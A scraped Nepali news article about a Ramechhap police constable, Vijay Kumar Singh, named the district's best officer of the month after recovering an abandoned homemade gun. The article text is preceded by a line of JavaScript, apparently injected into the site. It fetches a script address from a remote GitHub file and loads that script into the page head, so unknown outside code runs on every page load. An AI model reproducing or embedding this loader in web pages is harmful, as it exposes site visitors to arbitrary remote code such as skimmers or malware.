;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गुन्सीमा कार्यारत हवल्दार सिंह बने पुष महिनाको जिल्लाकै उत्कृष्ठ प्रहरी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गुन्सीमा कार्यारत हवल्दार सिंह बने पुष महिनाको जिल्लाकै उत्कृष्ठ प्रहरी
देश/प्रदेश

गुन्सीमा कार्यारत हवल्दार सिंह बने पुष महिनाको जिल्लाकै उत्कृष्ठ प्रहरी

माघ ०७,

रामेछाप । रामेछापको सुनापति गाउँपालिका गुन्सीमा कार्यरत प्रहरी हवल्दार विजय कुमार सिंह गत पुष महिनामा रामेछाप जिल्लामा कार्यरत प्रहरीहरुमा उत्कृष्ट काम गर्न सफल भएका छन् ।

उनलाई पुष महिनामा उत्कृष्ठ काम गरेको भन्दै  BEST POLICE OF THE MONTH को प्रमाण पत्रसहित नगद पुरस्कार प्रदान गरिएको छ ।

उनले पुष १८ गते डिउटीमा खटिएको समयमा जिल्लाको दोरम्बा गाउँपालिका वडा नं ७ स्थित ब्राम्हबिष्णु सामुदायिक बनमा पहिचान नखुलेको एक जना ब्यक्तिले घरेलु भरुवा बन्दुक हतियार लिएर हिडेको देखेर पक्राउ गर्ने खोज्दा हतियार फाली ती ब्यक्ती फरार भएको र सो स्थानबाट उनले १ नाल भरुवा बन्दुक भने बरामत गर्न सफल भएको भन्दै उनको कामको उच्च मूल्याङ्कनसहित उनलाई बेस्ट पुलिस अफ मन्थ घोषणा गरिएको हो जिल्ला प्रहरी कार्यालय रामेछापका प्रमुख वसन्त पाठकले हस्ताक्षर गरि सिंहलाई प्रदान गरेको पत्रमा उल्लेख गरिएको छ ।

Image may contain: 1 person

फेसबुक प्रतिक्रियाहरु